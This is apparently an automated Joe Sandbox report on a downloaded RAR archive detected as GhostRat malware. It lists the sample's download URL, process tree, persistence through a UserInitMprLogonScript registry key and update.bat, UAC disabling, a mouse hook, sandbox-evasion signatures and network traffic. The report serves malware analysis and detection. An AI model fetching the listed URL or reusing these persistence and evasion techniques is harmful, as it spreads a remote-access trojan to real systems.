Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar

Overview

General Information

Sample URL:https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar
Analysis ID:1585773
Infos:

Detection

GhostRat
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected GhostRat
Creates an undocumented autostart registry key
Disables UAC (registry)
Sigma detected: Suspicious Environment Variable Has Been Registered
Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT)
Uses regedit.exe to modify the Windows registry
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Installs a global mouse hook
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Common Autorun Keys Modification
Stores files to the Windows start menu directory
Stores large binary data to the registry

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 2888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1928,i,8402674929247263864,13808204845738003949,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 6924 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrome.exe (PID: 6876 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • OpenWith.exe (PID: 6156 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • rundll32.exe (PID: 7564 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • 7zG.exe (PID: 7660 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Downloads\" -an -ai#7zMap20622:68:7zEvent10885 MD5: 50F289DF0C19484E970849AAC4E6F977)
  • 7zG.exe (PID: 7788 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Downloads\????\" -spe -an -ai#7zMap30101:68:7zEvent28394 MD5: 50F289DF0C19484E970849AAC4E6F977)
  • 20250108.exe (PID: 7988 cmdline: "C:\Users\user\Downloads\????\?????\20250108.exe" MD5: B54F6F7A63A0E20DE1A80D1C8AAA2882)
    • 20250108.exe (PID: 8080 cmdline: "C:\Users\user\Downloads\????\?????\20250108.exe" MD5: B54F6F7A63A0E20DE1A80D1C8AAA2882)
      • regedit.exe (PID: 3840 cmdline: regedit /s C:\Users\Public\Documents\1.reg MD5: 999A30979F6195BF562068639FFC4426)
  • powershell.exe (PID: 636 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • 20250108.exe (PID: 1500 cmdline: "C:\Users\user\Downloads\????\?????\20250108.exe" MD5: B54F6F7A63A0E20DE1A80D1C8AAA2882)
    • 20250108.exe (PID: 3880 cmdline: "C:\Users\user\Downloads\????\?????\20250108.exe" MD5: B54F6F7A63A0E20DE1A80D1C8AAA2882)
  • cleanup
SourceRuleDescriptionAuthorStrings
00000013.00000002.2458700321.000001ABB57C7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
    0000001F.00000002.2455990458.000001F731F10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
      0000001F.00000002.2455552559.000001F731E30000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
        00000013.00000002.2456588504.000001ABB4A50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security

          System Summary

          barindex
          Source: Registry Key setAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Details: C:\Users\Public\Documents\update.bat, EventID: 13, EventType: SetValue, Image: C:\Windows\regedit.exe, ProcessId: 3840, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment\UserInitMprLogonScript
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name): Data: Details: C:\Users\Public\Documents\update.bat, EventID: 13, EventType: SetValue, Image: C:\Windows\regedit.exe, ProcessId: 3840, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment\UserInitMprLogonScript
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 636, ProcessName: powershell.exe
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6924, ProcessName: svchost.exe
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results
          Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49724 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.171.73.254:443 -> 192.168.2.16:49738 version: TLS 1.2
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: z:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: x:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: v:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: t:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: r:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: p:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: n:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: l:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: j:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: h:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: f:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: b:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: y:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: w:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: u:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: s:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: q:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: o:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: m:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: k:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: i:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: g:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: e:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: c:
          Source: C:\Users\user\Downloads\????\?????\20250108.exeFile opened: [:
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: chrome.exeMemory has grown: Private usage: 18MB later: 28MB
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 23.56.254.164
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: global trafficDNS traffic detected: DNS query: tom18860.s3.ap-northeast-1.amazonaws.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: ow1.res.office365.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.56.254.164:443 -> 192.168.2.16:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49719 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49720 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49724 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.171.73.254:443 -> 192.168.2.16:49738 version: TLS 1.2
          Source: C:\Users\user\Downloads\????\?????\20250108.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll

          System Summary

          barindex
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess created: C:\Windows\regedit.exe regedit /s C:\Users\Public\Documents\1.reg
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
          Source: classification engineClassification label: mal68.troj.evad.win@31/22@5/111
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
          Source: C:\Users\user\Downloads\????\?????\20250108.exeMutant created: NULL
          Source: C:\Users\user\Downloads\????\?????\20250108.exeMutant created: \Sessions\1\BaseNamedObjects\2025. 1. 7
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_762381681
          Source: C:\Users\user\Downloads\????\?????\20250108.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Z2omPA1C
          Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uumph0am.hmj.ps1
          Source: C:\Windows\System32\OpenWith.exeFile read: C:\Users\desktop.ini
          Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1928,i,8402674929247263864,13808204845738003949,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar"
          Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1928,i,8402674929247263864,13808204845738003949,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: unknownProcess created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Downloads\" -an -ai#7zMap20622:68:7zEvent10885
          Source: unknownProcess created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Downloads\????\" -spe -an -ai#7zMap30101:68:7zEvent28394
          Source: unknownProcess created: C:\Users\user\Downloads\????\?????\20250108.exe "C:\Users\user\Downloads\????\?????\20250108.exe"
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess created: C:\Users\user\Downloads\????\?????\20250108.exe "C:\Users\user\Downloads\????\?????\20250108.exe"
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess created: C:\Windows\regedit.exe regedit /s C:\Users\Public\Documents\1.reg
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess created: C:\Windows\regedit.exe regedit /s C:\Users\Public\Documents\1.reg
          Source: unknownProcess created: C:\Users\user\Downloads\????\?????\20250108.exe "C:\Users\user\Downloads\????\?????\20250108.exe"
          Source: C:\Users\user\Downloads\????\?????\20250108.exeProcess created: C:\Users\user\Downloads\????\?????\20250108.exe "C:\Users\user\Downloads\????\?????\20250108.exe"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
          Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
          Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
